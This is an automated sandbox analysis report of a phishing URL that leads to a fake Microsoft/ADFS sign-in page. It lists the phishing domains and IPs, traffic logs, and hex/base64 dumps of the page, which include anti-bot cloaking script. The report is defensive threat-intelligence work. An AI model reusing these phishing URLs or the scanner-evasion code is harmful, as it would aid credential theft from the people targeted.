Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283	0%	Avira URL Cloud	safe
https://sso.ninerscorretora.com.br/favicon.ico	0%	Avira URL Cloud	safe
https://proposaldocumentsviasecuredport.com/favicon.ico	0%	Avira URL Cloud	safe
https://sso.ninerscorretora.com.br/?mjalaytm&email=	0%	Avira URL Cloud	safe
https://rutaann.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs	0%	Avira URL Cloud	safe
https://rutaann.com/adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960	0%	Avira URL Cloud	safe
https://rutaann.com/favicon.ico	0%	Avira URL Cloud	safe
https://rutaann.com/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js	0%	Avira URL Cloud	safe
https://rutaann.com/adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E	0%	Avira URL Cloud	safe
https://rutaann.com/adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37	0%	Avira URL Cloud	safe
https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/scripts/jsd/main.js	0%	Avira URL Cloud	safe
https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?	0%	Avira URL Cloud	safe
https://rutaann.com/adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
proposaldocumentsviasecuredport.com	104.21.92.117	true	false	unknown
s-part-0010.t-0009.t-msedge.net	13.107.246.38	true	false	high
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
rutaann.com	103.114.43.73	true	true	unknown
challenges.cloudflare.com	104.18.95.41	true	false	high
www.google.com	142.250.80.100	true	false	high
gig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.com	52.179.73.57	true	false	high
sso.ninerscorretora.com.br	103.114.43.73	true	false	unknown
dc.services.visualstudio.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3D	false		high
https://a.nel.cloudflare.com/report/v4?s=7jbkxu4mns%2FD4i7vTYCTE8WTuUHzvYIXuWy8oFxgOXK67DzEgbSvqmqBnk%2FzwMzaDTbiAZE0c1pelBWVavwbhN%2F%2B5kK8HCPfi02O7k64So8ofCD8pL0PAUt%2FAtF11x%2Froalc%2F9qkIpEbWB6VewJtpiQHJfNJWQ%3D%3D	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd	false		high
https://rutaann.com/adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960	false	Avira URL Cloud: safe	unknown
https://sso.ninerscorretora.com.br/favicon.ico	false	Avira URL Cloud: safe	unknown
https://proposaldocumentsviasecuredport.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9261293dee55c468&lang=auto	false		high
https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9261293dee55c468/1742934575128/d51fc97ff5482a0e04d34c34824eb01eb3128cda53b4a0f70f6023263fe47e26/uPY28BXx41_v6Yh	false		high
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false		high
https://rutaann.com/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js	false	Avira URL Cloud: safe	unknown
https://dc.services.visualstudio.com/v2/track	false		high
https://rutaann.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1	false		high
https://rutaann.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://rutaann.com/adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI	false		high
https://a.nel.cloudflare.com/report/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3D	false		high
https://rutaann.com/adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E	false	Avira URL Cloud: safe	unknown
https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/scripts/jsd/main.js	false	Avira URL Cloud: safe	unknown
https://rutaann.com/adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/	false		high
https://proposaldocumentsviasecuredport.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://knockoutjs.com/	chromecache_80.2.dr	false		high
https://github.com/douglascrockford/JSON-js	chromecache_80.2.dr	false		high
http://www.opensource.org/licenses/mit-license.php)	chromecache_80.2.dr	false		high
https://sso.ninerscorretora.com.br/?mjalaytm&email=	chromecache_74.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.92.117	proposaldocumentsviasecuredport.com	United States	13335	CLOUDFLARENETUS	false
142.250.80.100	www.google.com	United States	15169	GOOGLEUS	false
172.67.192.251	unknown	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
52.179.73.57	gig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
103.114.43.73	rutaann.com	Bangladesh	137707	SLN-AS-APSLNBD	true
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1648503
Start date and time:	2025-03-25 21:28:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.phis.win@25/34@26/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.35.174, 142.251.40.131, 142.251.32.110, 192.178.155.84, 142.250.80.14, 142.250.80.46, 142.251.40.174, 142.251.41.10, 142.251.40.106, 142.251.40.170, 142.251.40.138, 142.250.80.42, 142.250.65.202, 142.250.176.202, 142.250.64.106, 142.250.80.106, 142.250.80.10, 142.250.72.106, 142.251.40.202, 142.251.40.234, 142.250.64.74, 142.250.65.170, 142.250.80.74, 23.203.176.221, 23.210.73.5, 142.251.40.110, 142.250.80.110, 172.217.165.138, 142.250.80.3, 172.217.165.142, 142.250.80.99, 184.31.69.3, 204.79.197.222, 4.245.163.56, 13.107.246.38, 13.107.246.40, 172.202.163.200
Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, az416426.vo.msecnd.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, ocsp.digicert.com, update.googleapis.com, csp.microsoft.com, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	22
Entropy (8bit):	3.6978458230844122
Encrypted:	false
SSDEEP:	3:jAbukMn:jP
MD5:	6AAB5444A217195068E4B25509BC0C50
SHA1:	7B22EAF7EAA9B7E1F664A0632D3894D406FE7933
SHA-256:	FC5525D427BFA27792D3A87411BE241C047D07F07C18E2FC36BF00B1C2E33D07
SHA-512:	AA5F66638B142B5E6D1D008F2934530C7AAD2F7F19128CA24609825D0DACFFD25A77591BFD7FB1D225BE2FA77CABCE837E0741326C1AC622C244D51E6FAFB303
Malicious:	false
Reputation:	low
URL:	https://sso.ninerscorretora.com.br/favicon.ico
Preview:	<h1>Access Denied</h1>

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 21:29:18.369326115 CET	53	56778	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:18.374382973 CET	53	62024	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:18.935939074 CET	53	63635	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:19.322073936 CET	53	64754	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:22.430222034 CET	50946	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:22.430632114 CET	53934	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:22.532632113 CET	53	50946	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:22.533143997 CET	53	53934	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:23.271203041 CET	63628	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:23.274014950 CET	64600	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:23.385327101 CET	53	64600	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:23.395483017 CET	53	63628	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:24.111727953 CET	61775	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:24.111990929 CET	57952	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:24.216525078 CET	53	61775	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:24.217736959 CET	53	57952	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:25.778601885 CET	53	61175	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:26.018352032 CET	53172	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:26.018556118 CET	65371	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:26.139400959 CET	53	65371	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:26.219629049 CET	53	53172	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:30.806870937 CET	59489	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:30.807069063 CET	54794	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:31.062380075 CET	53	54794	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:31.083101034 CET	53	59489	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:32.105762959 CET	63291	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:32.106003046 CET	64072	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:32.211055040 CET	53	64072	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:32.211648941 CET	53	63291	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:33.221416950 CET	65097	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:33.221961021 CET	53560	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:33.325777054 CET	53	65097	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:33.325824976 CET	53	53560	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:34.411626101 CET	58016	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:34.411890984 CET	65299	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:34.516249895 CET	53	58016	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:34.517292976 CET	53	65299	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:36.490451097 CET	53	55396	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:45.167983055 CET	51679	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:45.168070078 CET	55273	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:45.293431997 CET	53	55273	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:45.295439005 CET	53	51679	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:52.519468069 CET	49375	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:52.519732952 CET	58171	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:52.632169962 CET	53	58171	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:52.642848015 CET	53	49375	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:54.834990978 CET	53	57363	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:55.595885038 CET	53	51678	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:55.831657887 CET	64607	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:55.832056999 CET	53941	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:55.930207968 CET	53	53941	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:55.972726107 CET	53	64607	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:57.035424948 CET	59690	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:57.035424948 CET	55055	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:29:57.135113001 CET	53	59690	1.1.1.1	192.168.2.4
Mar 25, 2025 21:29:57.135380030 CET	53	55055	1.1.1.1	192.168.2.4
Mar 25, 2025 21:30:17.754275084 CET	53	60258	1.1.1.1	192.168.2.4
Mar 25, 2025 21:30:18.067212105 CET	53	49773	1.1.1.1	192.168.2.4
Mar 25, 2025 21:30:20.855106115 CET	53	55153	1.1.1.1	192.168.2.4
Mar 25, 2025 21:30:23.764882088 CET	138	138	192.168.2.4	192.168.2.255
Mar 25, 2025 21:30:24.119831085 CET	53851	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:30:24.120049000 CET	59556	53	192.168.2.4	1.1.1.1
Mar 25, 2025 21:30:24.224040985 CET	53	53851	1.1.1.1	192.168.2.4
Mar 25, 2025 21:30:24.224932909 CET	53	59556	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 21:29:30.000437021 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 21:29:30.096599102 CET	222	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 20:23:27 GMT Expires: Tue, 25 Mar 2025 21:13:27 GMT Age: 363 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 25, 2025 21:29:30.103205919 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 21:29:30.202554941 CET	222	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 20:23:30 GMT Expires: Tue, 25 Mar 2025 21:13:30 GMT Age: 360 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:23 UTC	724	OUT	GET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:24 UTC	1351	IN	HTTP/1.1 503 Service Temporarily Unavailable Date: Tue, 25 Mar 2025 20:29:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Content-Type-Options: nosniff X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-XSS-Protection: 1; mode=block Set-Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400; Set-Cookie: Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400; Set-Cookie: HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400; Set-Cookie: nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400; X-Frame-Options: SAMEORIGIN Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: 0 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
2025-03-25 20:29:24 UTC	280	IN	Data Raw: 43 46 2d 52 41 59 3a 20 39 32 36 31 32 38 66 66 63 64 65 62 64 39 32 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 31 37 32 39 26 6d 69 6e 5f 72 74 74 3d 31 30 31 30 38 32 26 72 74 74 5f 76 61 72 3d 32 32 32 39 38 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 39 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 39 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 36 31 35 30 26 63 77 6e 64 3d 32 33 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 36 38 65 63 62 65 62 Data Ascii: CF-RAY: 926128ffcdebd92a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=101729&min_rtt=101082&rtt_var=22298&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1296&delivery_rate=36150&cwnd=232&unsent_bytes=0&cid=68ecbeb
2025-03-25 20:29:24 UTC	1369	IN	Data Raw: 31 63 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d Data Ascii: 1c9d<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
2025-03-25 20:29:24 UTC	1369	IN	Data Raw: 37 43 69 41 67 49 43 41 67 49 43 41 67 64 6d 46 79 49 47 45 67 50 53 42 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 49 48 74 30 63 6e 6c 37 63 6d 56 30 64 58 4a 75 49 43 45 68 64 32 6c 75 5a 47 39 33 4c 6d 46 6b 5a 45 56 32 5a 57 35 30 54 47 6c 7a 64 47 56 75 5a 58 4a 39 49 47 4e 68 64 47 4e 6f 4b 47 55 70 49 48 74 79 5a 58 52 31 63 6d 34 67 49 54 46 39 49 48 30 73 43 69 41 67 49 43 41 67 49 43 41 67 59 69 41 39 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 49 73 49 47 4d 70 49 48 74 68 4b 43 6b 67 50 79 42 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 4a 45 54 30 31 44 62 32 35 30 5a 57 35 30 54 47 39 68 5a 47 56 6b 49 69 77 67 59 69 77 67 59 79 6b 67 4f 69 42 6b 62 32 4e 31 62 57 56 75 64 43 35 68 64 48 Data Ascii: 7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdH
2025-03-25 20:29:24 UTC	1369	IN	Data Raw: 62 47 56 79 4b 58 73 76 4b 6d 4e 6f 63 6d 39 74 61 58 56 74 49 47 4a 68 63 32 56 6b 49 47 46 31 64 47 39 74 59 58 52 70 62 32 34 67 5a 48 4a 70 64 6d 56 79 4b 69 38 4b 61 57 59 6f 49 58 64 70 62 6d 52 76 64 79 35 6b 62 32 4e 31 62 57 56 75 64 43 35 6b 62 32 4e 31 62 57 56 75 64 45 56 73 5a 57 31 6c 62 6e 51 75 5a 32 56 30 51 58 52 30 63 6d 6c 69 64 58 52 6c 4b 43 4a 33 5a 57 4a 6b 63 6d 6c 32 5a 58 49 69 4b 53 6c 37 43 69 38 71 61 57 59 6f 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 6c 37 4b 69 38 4b 61 57 59 6f 49 53 39 69 62 33 52 38 59 33 56 79 62 48 78 72 62 32 52 70 66 48 68 69 62 57 4e 38 64 32 64 6c 64 48 78 31 63 6d 78 73 61 57 4a 38 63 48 6c 30 61 47 39 75 66 48 64 70 62 6d 68 30 64 48 42 38 61 48 52 30 63 6d 46 Data Ascii: bGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmF
2025-03-25 20:29:24 UTC	1369	IN	Data Raw: 57 35 6e 64 47 67 67 50 69 41 77 4b 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6b 62 32 4e 31 62 57 56 75 64 43 35 6d 62 33 4a 74 63 31 73 77 58 53 35 7a 64 57 4a 74 61 58 51 6f 4b 54 73 4b 49 43 42 39 49 47 56 73 63 32 55 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 43 46 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 61 47 46 7a 61 43 6b 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 